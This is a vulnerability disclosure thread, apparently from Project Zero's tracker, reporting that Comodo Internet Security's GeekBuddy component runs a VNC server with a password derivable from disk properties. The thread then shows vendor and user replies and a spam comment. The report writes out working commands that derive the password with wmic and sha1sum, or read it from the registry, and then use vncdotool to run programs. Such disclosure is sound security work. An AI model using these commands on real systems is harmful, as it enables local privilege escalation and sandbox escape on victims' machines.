Comodo: Comodo Internet Security installs and starts a VNC server by default
Project Member Reported by email@example.com, Jan 20 2016
When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application, that uses a number of questionable and shady tactics to encourage users to pay for online tech support. https://www.comodo.com/home/support-maintenance/geekbuddy.php As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default. e.g. https://forums.comodo.com/geekbuddy-live-pc-support/geekbuddy-tightvnc-http-port-opened-default-on-5800-without-request-vulnerable-t111103.0.html https://packetstormsecurity.com/files/131963/Comodo-GeekBuddy-Local-Privilege-Escalation.html https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7872 This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved. Not to mention that this is also a sandbox escape that even works against Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other sandboxes. This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this: $ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks Caption SerialNumber Signature TotalTracks VMware, VMware Virtual S SCSI Disk Device -135723213 1997160 $ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8 7d4612e5 $ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 - I'm using vncdotool from here: https://github.com/sibson/vncdotool (Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug) Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!): $ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3 Screenshot attached for reference. It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Feb 18 2016,
Update today: Hello Tavis, Regarding the vulnerability below, we have issued a hotfix on 10th of February. GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.
Feb 19 2016,
Wow, so that's what you meant on Twitter. That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it. Thanks for everything you and Project Zero does. :)
Feb 20 2016,
comment from Comodo https://blog.comodo.com/comodo-news/10747/
Feb 21 2016,
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.
Feb 22 2016,
This transcends a simple bug and vulnerability, it is a backdoor.
Feb 26 2016,
@tobias, indeed, it's also written after the fact, as though the current state is how it was before. You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
Apr 2 2016,
Thanks for your greeting. i have see your profile blog, i very like with your page. but i need much more about your article smile because your article is so so nice. http://daftarcaramembuatakunemail.blogspot.com
Sign in to add a comment